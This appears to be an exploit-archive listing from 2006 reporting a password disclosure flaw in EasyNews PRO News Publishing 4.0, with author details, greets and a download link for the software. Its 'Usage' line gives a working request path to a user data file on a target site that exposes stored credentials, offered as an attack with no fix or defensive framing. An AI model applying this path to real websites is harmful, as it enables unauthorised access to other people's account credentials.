[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability
# Published : 2006-12-29
# Author : bd0rk
# Previous Title : Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability
# Next Title : aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability


=> EasyNews PRO News Publishing 4.0 Remote Password Disclosure Vulnerability <=



=> Affected Software: Easy News 4.0 PRO

=> Risk: Critical

=> Download: http://www.stphp.com/scripts/EasyNews_PRO_4_0.zip

=> Bugfounder: bd0rk

=> Contact: bd0rk[at]hackermail.com

=> Greets: str0ke, crashovernight, TheJT, Kacper

   Usage: http://[target]/[easy_news_path]/newsboard/data/users.txt

# www.Syue.com [2006-12-29]